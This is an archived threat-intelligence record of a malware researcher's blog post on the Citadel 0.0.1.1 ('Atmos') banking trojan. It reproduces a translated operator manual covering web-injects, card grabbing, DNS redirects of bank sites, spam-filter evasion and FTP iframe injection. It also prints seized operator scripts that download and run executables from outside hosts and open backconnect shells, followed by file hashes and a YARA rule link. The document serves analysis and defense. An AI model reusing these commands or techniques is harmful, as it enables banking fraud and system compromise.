{
	"id": "451829dd-b693-439d-af06-36fe4ff68250",
	"created_at": "2026-04-06T00:16:49.408564Z",
	"updated_at": "2026-04-10T03:24:18.080781Z",
	"deleted_at": null,
	"sha1_hash": "7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf",
	"title": "Citadel 0.0.1.1 (Atmos)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5868609,
	"plain_text": "Citadel 0.0.1.1 (Atmos)\r\nArchived: 2026-04-05 20:01:03 UTC\r\nGuys of JPCERT, 有難う御座います！\r\nReleased an update to their Citadel decrypter to make it compatible with 0.0.1.1 sample.\r\nCitadel 0.0.1.1 don't have a lot of documentation, so time as come to talk about it.\r\nPersonally i know this malware under the name 'Atmos' (be ready for name war in 3,2,1...)\r\n  The first sample i was aware is the one spotted by tilldenis here in jully 2015.\r\nI re-observed this campaign in november 2015 with the same 'usca'.\r\nYou can find a technical description of the product here: http://pastebin.com/raw/cAqbrqAS\r\nHere is a small part translated to English related to configuration and commands:\r\n3. Configuration\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 1 of 58\n\nurl_config1-10 [up to 10 links to configuration files; 1 main for your web admin panel and 9 spare ones. To save\r\nthe resources, use InterGate button in the builder to place config files on different links without setting up admin\r\npanel. Spare configs will be requested if the main one is not available during first EXE launch. Don't forget to put\r\nEXE and config files in 'files/' folder]\r\ntimer_config 4 9\r\n[Config file refresh timer in minutes | Retry interval]\r\ntimer_logs 3 6 [Logs upload timer in minutes | Retry in _ minutes]\r\ntimer_stats 4 8 [New command receiving and statistics upload timer in minutes | Retry in _ minutes]\r\ntimer_modules 4 9 [Additional configuration files receiving timer | Retry in _ minutes. Recommending to use the\r\nsame setting as in timer_config]\r\ntimer_autoupdate 8 [EXE file renewal timer in hours]\r\ninsidevm_enable 0/1 [Enable execution in virtual machine: 1 - yes | 0 - no]\r\ndisable_antivirus 0/1 [1 - Disable built-in 'AntiVirus' that allows to delete previous version of Zeus/Citadel/Citra\r\nafter EXE lauch |  0 - leave enabled(recommended)]\r\ndisable_httpgrabber 0/1 [1 - Disable http:// mask grabber in IE | 0 - Enable http:// mask grabber in IE]\r\nenable_luhn10_get 0/1 [Enable CC grabber in GET-requests http/https]\r\nremove_certs 0/1 [Enable certificate deletion in IE storage]\r\nreport_software 0/1 [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 -\r\nDisable]\r\ndisable_tcpserver 0/1 [1 - Enable opening SOCKS5 port (not Backconnect!) | 0 - Disable]\r\nenable_luhn10_post 0/1 [Enable CC grabber in POST-requests http/https]\r\ndisable_cookies 0/1 [1- Disable IE/FF cookies-storage upload | 0 - Enable | use_module_ffcookie - duplicates the\r\nsame]\r\nfile_webinjects \"injects.txt\" [File containing injects. Installed right after successful config files installation.\r\nRenewal timer is set in timer_config]\r\nurl_webinjects \"localhost/file.php\" [Path to 'file.php' file. Feature of 'Web-Injects' section for remote instant inject\r\nloading]\r\nAdvancedConfigs [Links to backup configuration files. Works if !bot is already installed on the system! and first\r\nurl_config is no longer accessible]\r\nentry \"WebFilters\" [Set of different filters for URLs: video(# character), screenshot(single @ character -\r\nscreenshot sequence after a click in the active zone. double @ character '@@' - Full size screenshot), ignore (!\r\ncharacter), POST requests logging (P character), GET request logging (G character)]\r\nentry HttpVipUrls [URL blacklist. By default the follwing masks are NOT written to the logs \"facebook*\"\r\n\"*twitter*\",  \"*google*\". Adding individual lines with these masks will enable logging for them again]\r\nentry \"DnsFilters\" [System level DNS redirect, mask example - *bankofamerica.com*=159.45.66.100. Now\r\nwhen going to bankofamerica.com - wellsfargo.com will be displayed. Not recommending blocking AV sites to\r\navoid triggering pro-active defenses]\r\nentry \"CmdList\" [List of system commands after launch and uploading them to the server]\r\nentry \"Keylogger\" [List of process names for KeyLogger. Time parameter defines the time to work in hours after\r\nthe process initialization]\r\nentry \"Video\" [Video recording settings | x_scale/y_scale - video resolution | fps - frame per second, 1 to 5 |  kbs\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 2 of 58\n\n- frame refresh rate, 5 to 60 | cpu 0-16 CPU loading | time - time to record in seconds | quality 0-100 - picture\r\nquality]\r\nentry \"Videologger\" - [processes \"\" - list of processes to trigger video recording. Possible to use masks, for\r\nexample calc.exe or *calc*]\r\nentry \"MoneyParser\" [Balance grabber settings | include \"account,bank,balance\" - enable balance parsing if\r\nhttps:// page contains one of the following key words. | exclude \"casino,poker,game\" - do NOT perform parsing if\r\none of the following words is found]\r\nentry \"FileSearch\" [File search by given mask. The report will be stored in 'File Hunter' folder. Keywords can be\r\na list of files or patterns ** to for on the disk. For example, multibit.exe will search for exact match on\r\nfilename.fileextension, *multibit* will report on anything found matching this pattern. | excludes_name - exclude\r\nfilenames/fileextensions from search. excludes_path - exclude system directories macros, like, Windows/Program\r\nFiles, etc | minimum_year - file creation/change date offset. The search task is always on. Remove all the\r\nparameters from this section to disable it.]\r\nentry \"NetScan\" [hostname \"host-to-scan.com\" - list of local/remote IP addresses to scan. scantype \"0\" - sets the\r\nIP address range, for example, scantype \"0\" scans a single IP in the 'hostname', scantype \"1\" creates a full scan of\r\nclass C network 10.10.10.0-255, scantype \"2\" creates a full scan of class B network 10.10.0-255.0-255]\r\nExample 1 {hostname \"10.10.0-255.0-255\" addrtype \"ipv4\" porttype \"tcp\" ports \"1-5000\" scantype \"2\"}\r\nExample 2 {hostname \"10.10.1.0-255\" addrtype \"ipv4\" porttype \"tcp\" ports \"1-5000\" scantype \"1\"}]\r\nentry \"WebMagic\" [Local WebProxySrv, web server with its own storage. Allows to read and write bot\r\nparameters directly, for example, when using injects. This saves time and resources since it doesn't generate\r\nadditional remote requests for different scripts that are generally detected by banks anti-tampering controls. It also\r\nallows to bypass browser checking when requesting https:// resource hosted remotely and to create backconnect\r\nconnection. Full settings description is located in F.A.Q section]\r\n4. Commands\r\nuser_execute \u003curl\u003e [execute given file]\r\nuser_execute \u003curl\u003e -f [execute given file, manual bot update that overwrites the current version]\r\nuser_cookies_get [Get IE cookies]\r\nuser_cookies_remove [Remove IE cookies]\r\nuser_certs_get [Get .p12 certificates. Password: pass]\r\nuser_certs_remove [Remove certificates]\r\nuser_homepage_set \u003curl\u003e [Set browser home page]\r\nuser_flashplayer_get [Get user's .sol files]\r\nuser_flashplayer_remove [Remove user's .sol files]\r\nurl_open \u003curl\u003e [open given URL in a browser]\r\ndns_filter_add \u003chostname\u003e \u003cip\u003e [Add domain name for redirect(blocking) *bankofamerica.com* 127.0.0.1]\r\ndns_filter_remove \u003curl\u003e [Remove domain name from redirect(blocking)]\r\nuser_destroy [Corrupt system vital files and reboot the system. Requires elevated privileges]\r\nuser_logoff [Logoff currently logged in user]\r\nos_reboot [Reboot the host]\r\nos_shutdown [Shutdown the host]\r\nbot_uninstall [Remove bot file and uninstall it]\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 3 of 58\n\nbot_update \u003curl\u003e [Update bot configuration file. Requires to use the same the crypt. The path is set in\r\nurl_config]\r\nbot_bc_add socks \u003cip\u003e \u003cport\u003e [Connect Bot \u003e Backconnect Server \u003e Socks5 | Run backconnect.exe listen -\r\ncp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for\r\nProxifier/Browser...]\r\nbot_bc_add vnc \u003cip\u003e \u003cport\u003e [Connect Bot \u003e Backconnect Server \u003e VNC Remote Display |  Run\r\nbackconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required\r\nfor UltraVNC client]\r\nbot_bc_add cmd \u003cip\u003e \u003cport\u003e [Connect Bot \u003e Backconnect Server \u003e Remote Shell | Run backconnect.exe listen\r\n-cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for telnet/putty client ]\r\nbot_bc_remove \u003cservice\u003e \u003cip\u003e \u003cport\u003e [Disconnect from the bot and hide connections from 'netstat' output]\r\nclose_browsers [close all browser processes]\r\nAnd one part related to some new features:\r\nQ:\r\nHow does Mailer works?\r\nA: This feature allows you to create mass-email campaigns using standard PHP tools.\r\nFor this feature to work correctly you need to download the script [Download Script] and put it in www-root\r\ndirectory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the\r\nfollowing in php.ini; magic_quotes_gpc = Off and safe_mode = Off\r\nAfter that press [ Config ] and fill in [Master E-Mail (for checkup) parameters: \"name ; email\" Your email for\r\nchecking] and Mailer-script URL: http://www.host.com/mailer.php\r\nIt's possible to create a campaign using a email address list collected by a Bot using \"For BotID\" button or a new\r\nlist name;email\r\nMacros are supported in в Subject/Body/Attach.\r\n{name} - Receiver name | {email} - Receiver E-mail | {random} - random chars | {rand0m} - random long\r\nnumber\r\nRecommendation: To avoid being blocked by spam-filters use macro name@{hostname} in Sender (\"email\" or\r\n\"name ; email\") field - in this case the real domain name of the sending host will be used and your emails will not\r\nend up in Spam folder.\r\nQ: How to work with File Hunter feature?\r\nA: This feature allows you to work with files on the bot: get list of files matching the parameters specified under\r\nconfig entry \"FileSearch\", track files updates, autoupload files and replace files on the bot.\r\nCustom Download - allows you to download any file from a bot by BotID, taken that a full path to the file is\r\nknown. This will work even if the file is not specified under \"FileSearch\" config entry.\r\nAuto download - uploads files with a given mask without a need to specify BotID. Bot will execute the upload as\r\nsoon as search conditions are given and the file found. This will work even if the file is not specified under\r\n\"FileSearch\" config entry.\r\nBe careful using File Hunter to modify any files on the bot. It's main purpose is to grab *coin\r\nfiles(multibit.dat/litecoin.dat...)\r\nUse mouse right-click to access context menu for file list.\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 4 of 58\n\nQ: Short manual for FTP Iframer\r\nA: As in the case with 'Mailer', For this feature to work correctly you need to download the iframer script\r\n[Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off\r\nNext, create configuration options by pressing on [ Конфигурация ]\r\nSpecify the script URL in URL field\r\nWorking mode: Just checking [ Will check the validity of FTP accounts found in the logs ]\r\nInject: [Mode: \"ON\"]\r\nInject method: Smart/Add/Overwrite [ Smart - will re-add the inject in case if it was detected and deleted. / Add -\r\niframe code will be added to the end of the file before \u003c/body\u003e\u003c/html\u003e]\r\nLookup depth: [ File search level on ftp-host. For example, in the following structure FTP Connection \u003e\r\npublic_html(1) \u003e images(2) \u003e gif(3)....]\r\nNext, perform 'Accounts search' and 'Run tasks'. The statistics and results will be available after a few minutes.\r\nThe script will be working in cron-mode after the first execution, so there is no need to keep the page opened.\r\nQ: Main functions and methods of \"Neuromodel\"\r\nA: Neuromodel allows you to perform complex analysis of your botnet: identifying best bots, upload success\r\nrates. You can build a research matrix that includes list of bots and evaluate them against specified criteria;  the\r\nresult will be calculating a score to each bot.\r\nEach research matrix can contain a number of evaluation criteria. For example, you need to search the logs for the\r\nfollowing data: Bank Acc + CC or Bank Acc + ISP E-mail\r\nCreate profile first and then plan the task based on required criteria.\r\nTask - \"Find bots that logged into http://www.bankofamerica.com id=* in the last 30 days and where McAfee is\r\ninstalled. Assign X score if the search criteria match\"\r\nCreating criteria:\r\n1) { name: BOA LOGIN | criteria: HTTP data POST | URL masks: htt*://www.bankofamerica.com/* | POST data\r\nmasks: id=* | days limit: 30 | score: 1 | static method, trigger condition: No \u003c 1 }\r\n2) { name: AVCheck | criteria: installed software | software name mask: McAfee* | days limit: 30 | score: 1 trigger\r\ncondition: No \u003c 1 }\r\nStatic method is used to summarize the results.\r\n* **No**: simple summary. Each successful criteria match adds specified score to the bot. More matches = bigger\r\nthe score.\r\nExample 1: if it found 180 reports matching the criteria and the score is 2 then the final score will be '180*2'\r\nExample 2: if 'Login to bankofamerica' criteria  is set to \"\u003e=\" \"3\" on average a day then the score will be added\r\nonly for the last days specified in 'Days' parameter.\r\nDetailed: if in the last days specified in 'Days' parameter the 'Login to bankofamerica' criteria was matched more\r\nthan 3 times on average then the bots reported will be given the score points.\r\n* **Sum** Summary of produced reports\r\nScore 'Points' will be added if the amount of reports satisfying the search criteria complies with trigger condition.\r\nFor example, if we have `reports_count=180` and `Points=2` and trigger condition is `\u003e= 180` then the score is\r\n+2.\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 5 of 58\n\n* **Days**: active days summary: days containing the reports.\r\nScore will be added if the amount of reports satisfying the search criteria complies with trigger condition.\r\nFor example, if we have reports from day before yesterday, yesterday and today and trigger condition is set to `\u003e=\r\n3` then the scores will be added.\r\n* **Avg/Day**: Average/Day: average number of reports in the last 24 hours\r\n* **Avg/Week**: Average/Week: average number of reports per week\r\n* **Days/Week**: average number of active days per week\r\nAnother example, search for inactive accounts:\r\n\"Find the bots regardless of their scores that logged into USBank in the last 21 days no more than 3 times - no\r\nfilters or criteria are applied\"\r\n1) { URL = https://onlinebanking.usbank.com/Auth/Login/Login* | HTTP URL visit| days limit = 21 | Login no\r\nmore than 3 times: e.g. login \u003c=3. Meaning, if found \u003c=3 reports for this criteria — add 1 to the score. | SUM()\r\n\u003c=3 , 1 score }\r\nFull criteria list is below:\r\nCondition using date/time of the first report received from the bot.\r\nCondition using date/time of the last report received from the bot.\r\nCondition using average online time of the bot per week or per hour.\r\nCondition using a type of the report or it's content\r\n\u003ePresence/Lack of LUHN10(CC)\r\n\u003ePresence/Lack of ISP email address (pop3 or web-link)\r\n\u003ePresence/Lack of FTP accounts\r\n\u003eSearch by key words\r\nCondition using \"Installed Software\" reports, allows you to check for a particular software installed on the bot.\r\nCondition using \"CMD\" reports, allows to use particular keywords.\r\nCondition using visited one or many particular URLs\r\nCondition using POST variables.\r\nMinus some absolute nonsense in the description of AVG/Day, AVG/week and days/weeks\r\nThe author is a fecking lunatic trying to explain things that only he understand :)\r\nThanks to Malwageddon for the translation help.\r\nNow.. take a free tour in the infrastructure.\r\nLogin:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 6 of 58\n\nDashboard:\r\nRU and UA flags, united forever :)\r\nexe configuration:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 7 of 58\n\nOperating system:\r\nSoftware:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 8 of 58\n\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 9 of 58\n\nFirewall:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 10 of 58\n\nAV:\r\nSearch:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 11 of 58\n\nBots:\r\n Legend:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 12 of 58\n\nFull information:\r\nWebInject:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 13 of 58\n\nReported errors:\r\nNew group:\r\nEdit a webinject:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 14 of 58\n\nWebinjects for the group 'Canada':\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 15 of 58\n\nUS:\r\nEdit a webinject:\r\nScript:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 16 of 58\n\nScript edit:\r\nSome scripts sample:\r\ntokenspy_update tokenspy-config.json\r\nhvnc_start 176.9.174.237 29223\r\nbot_bc_add vnc\r\nbot_bc_add socks 176.9.174.237 37698\r\nuser_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe\r\ntransfer\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 17 of 58\n\nuser_destroy\r\nuser_execute http://iguana58.ru/plugins/system/anticopy/adobe.exe\r\nuser_ftpclients_get\r\nuser_execute htxp://iguana58.ru/plugins/system/anticopy/adobe.exe\r\nuser_execute htxp://mareikes.com/wp-includes/pomo/svhost.exe -f\r\nuser_execute htxp://mareikes.com/wp-includes/pomo/server.exe\r\nuser_execute htxp://mareikes.com/wp-includes/pomo/ammy.exe\r\nuser_execute http://tehnoart.co/sr.exe -f\r\nuser_execute http://3dmaxkursum.net/tmp/sys/config.exe\r\nuser_execute http://coasttransit.com/wp-content/gallery/gulfport-transit-center/thumbs/htasees.exe\r\n• dns: 1 ›› ip: 185.4.73.33 - adress: IGUANA58.RU\r\n• dns: 1 ›› ip: 176.9.24.49 - adress: MAREIKES.COM\r\n• dns: 1 ›› ip: 107.180.26.93 - adress: TEHNOART.CO\r\n• dns: 1 ›› ip: 94.73.144.210 - adress: 3DMAXKURSUM.NET\r\n• dns: 1 ›› ip: 184.168.47.225 - adress: COASTTRANSIT.COM\r\nSocks:\r\nVNC:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 18 of 58\n\nExample of infected endpoints:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 19 of 58\n\nConfig:\r\nBackconnect logs:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 20 of 58\n\nFiles:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 21 of 58\n\nSHA1: 9EA4041C41C3448E5A9D00EEA9DACB9E11EBA6C0\r\nbcservice.ini:\r\n[bcservice]\r\nclient_starting_port=200\r\nbots_port=30\r\nreboot_every_m=10\r\nTrashed binnaries:\r\nSHA1: 987B468DB8AA400171E5365E89C3120F13F728EE\r\nAtmos builder:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 22 of 58\n\nSHA1: D3F992DCDBB0DF54C4A383163172F69A1CA967AE\r\nServer logs start the 3 oct 2015:\r\nTokenSpy:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 23 of 58\n\nWith a nice ring animation :)\r\nRule/test:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 24 of 58\n\nSearch database:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 25 of 58\n\nSearch list:\r\nSetup:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 26 of 58\n\nWith a reference to citadel.\r\nReport:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 27 of 58\n\nFavorite reports:\r\nSearch in files:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 28 of 58\n\nScreenshot:\r\nView videos:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 29 of 58\n\nCMD parser:\r\nNeuromodel:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 30 of 58\n\nEdit:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 31 of 58\n\nLinks:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 32 of 58\n\nBalance grabber:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 33 of 58\n\nConfig:\r\nActivity:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 34 of 58\n\nJabber notifier:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 35 of 58\n\nNotes:\r\nCrypt exe:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 36 of 58\n\nFTP iframer:\r\nConfig:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 37 of 58\n\nIframe lead on a Keitaros TDS who lead on malware:\r\nThat right, second one is a blackhole exploit kit.\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 38 of 58\n\nJérôme Segura of MalwareBytes have wrote about this one here: https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/\r\nFirst one is RIG exploit kit delivering Chthonic targeting Russia and Ukraine.\r\nAnd for update-flashplayer.ml, update-flash-security.ml, they lead to iBanking download.\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 39 of 58\n\nSHA1: E536E23409EBF015C500D5799AD8C70787125E95\r\nCNC at templatehtml.ru\r\nTo get back on the original subject, here is the File hunter:\r\nDownloaded:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 40 of 58\n\nTrash:\r\nMailer:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 41 of 58\n\nConfig:\r\nMail:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 42 of 58\n\nInformations:\r\nOptions:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 43 of 58\n\nJabber adress:\r\nUser:\r\nUsers:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 44 of 58\n\nDifferent admins with different rights:\r\nSome users have limited actions, for exemple one guys had only access to malware upload feature, probably to\r\nrefresh the crypt.\r\n6 users including the master user is using russian language on the panel, the rest is configured on english\r\nlanguage.\r\nInstall:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 45 of 58\n\nFiles:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 46 of 58\n\nCC parser:\r\nWebinject server:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 47 of 58\n\nDashboard:\r\nView:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 48 of 58\n\nSettings:\r\nReplacer settings:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 49 of 58\n\nChat:\r\nDrop:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 50 of 58\n\nFakes:\r\nWebInject server 2:\r\nDashboard:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 51 of 58\n\nCommand:\r\nLogs:\r\nCash list:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 52 of 58\n\nStats:\r\nDrops:\r\nState stats:\r\nUser management:\r\nExport CSV:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 53 of 58\n\nHelp:\r\n/s/ panel:\r\nShow infos:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 54 of 58\n\nState stats:\r\nHelp:\r\n/s2/ panel:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 55 of 58\n\n/s3/ panel:\r\nPony used by one member of the gang:\r\nBrowser logs:\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 56 of 58\n\nCitadel 0.0.1.1 samples:\r\nA7D98B79FBDD7EFEBE4945F362D8A233A84D0E8D\r\nC286C31ECC7119DD332F2462C75403D36951D79F\r\nD399AEDA9670073E522B17B37201A1116F7D2B94\r\nBFD9251E135D63F429641804C9A52568A83831CA\r\n2E28E9ACAC691A40B8FAF5A95B9C92AF0947726F\r\n5CAC9972BB247502E700735067B3A37E70C90278\r\n959F8A78868FFE89CD4A0FD6F92D781085584E95\r\n2716D3DE18616DBAB4B159BACE2F2285DA358C84\r\n450A638957147A62CA9049830C3452B703875AEE\r\n7C90F27C0640188EA5CF2498BF5964FF6788E79C\r\n14C0728175B26446B7F140035612E303C15502CB\r\n267DA16EC9B114ED5D9F5DEE07C2BF77D4CFD5E6\r\nE6DD260168D6B1B29A03DF1BA875C9065B146CF3\r\n963FE9DCEDA3A4552FAA88BABD4E9954B05C83D2\r\n4F6AE5803C2C3EE49D11DAB48CA848F82AE31C16\r\n8BBFA46A2ADCDF0933876EF920826AB0B02FCC18\r\nDecrypted Citadel plugins:\r\nB3FDC0DAFA7C0A2076AB4D42317A0E0BAAF3BA78\r\n0B40F80C025C199F7D940BED572EA08ADE2D52F9\r\n3B004C68C32C13CAF7F9519B6F7868BF99771F30\r\nHidden VNC demo: https://www.youtube.com/watch?v=TDOZfalD_LY\r\nAtmos package:\r\n056709A96FE05793B3544ACB4413A9EF827DCEEF\r\nC1B79552B6F770D96B0A0C25C8C8FD87D6D629B9\r\nOther samples (not Atmos):\r\n02FFC98E2B5495E9C760BDA1D855DCA48A754243\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 57 of 58\n\nB7AE6D5026C776F123BFC9DAECC07BD872C927B4\r\n56B58A03ADB175886FBCA449CDB73BE2A82D6FEF\r\nSome other atmos sample (Courtesy of Kafeine):\r\n8BBFA46A2ADCDF0933876EF920826AB0B02FCC18\r\nDAABF498242018E3EE16513E2A789D397141C7AC\r\n04F599D501EA656FB995D1BFA4367F5939631881\r\nYou can find my yara rules for mitigating Atmos here: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Atmos.yar\r\nThe Google Chrome injections appear to work from v25.0.1349.2 (2012/12/06), till v43.0.2357.134 (2015/07/14)\r\nFun thing: I got correlations with a CoreBot sample and their webinjects used.\r\nch_new, wf2, cu_main, citi_new, ebay_new, [...]\r\nSame kind of campaign inside their panels and same custom file names.\r\nif you look for more infos about Citadel, the community did a great work here\r\nhttp://www.kernelmode.info/forum/viewtopic.php?f=16\u0026t=1465\r\n継続は力なり\r\nSource: http://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nhttp://www.xylibox.com/2016/02/citadel-0011-atmos.html\r\nPage 58 of 58",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
	],
	"report_names": [
		"citadel-0011-atmos.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434609,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf.pdf",
		"text": "https://archive.orkl.eu/7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf.txt",
		"img": "https://archive.orkl.eu/7cdcd3e1ab41cbd98f723dab0c1025e9a9d25aaf.jpg"
	}
}